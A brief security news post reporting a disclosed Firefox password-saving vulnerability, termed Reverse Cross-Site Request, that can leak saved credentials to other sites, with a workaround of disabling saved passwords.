A new vulnerability in Firefox has been recently disclosed. The password saving functionality of Firefox can be exploited to expose usernames and passwords to other sites, such as those used for blogs or any page requesting user input. The proof of concept page shows the username and password input in a google URL. They are calling it a Reverse Cross-Site Request (RCSR) vulnerability. The advisory appears
here.
This type of attack vector appears to also affect Internet Explorer.
Bugzilla
link.
Mozilla has apparently been advised of the vulnerability, there currently is no vendor patch. The workaround in this particular case would be to never use Firefox to save passwords for any web site. The option is under Tools, Options, Security. Here is a
link showing how to disable it.
Thanks to our reader Carsten for letting us know.
Cheers,
Adrien de Beaupre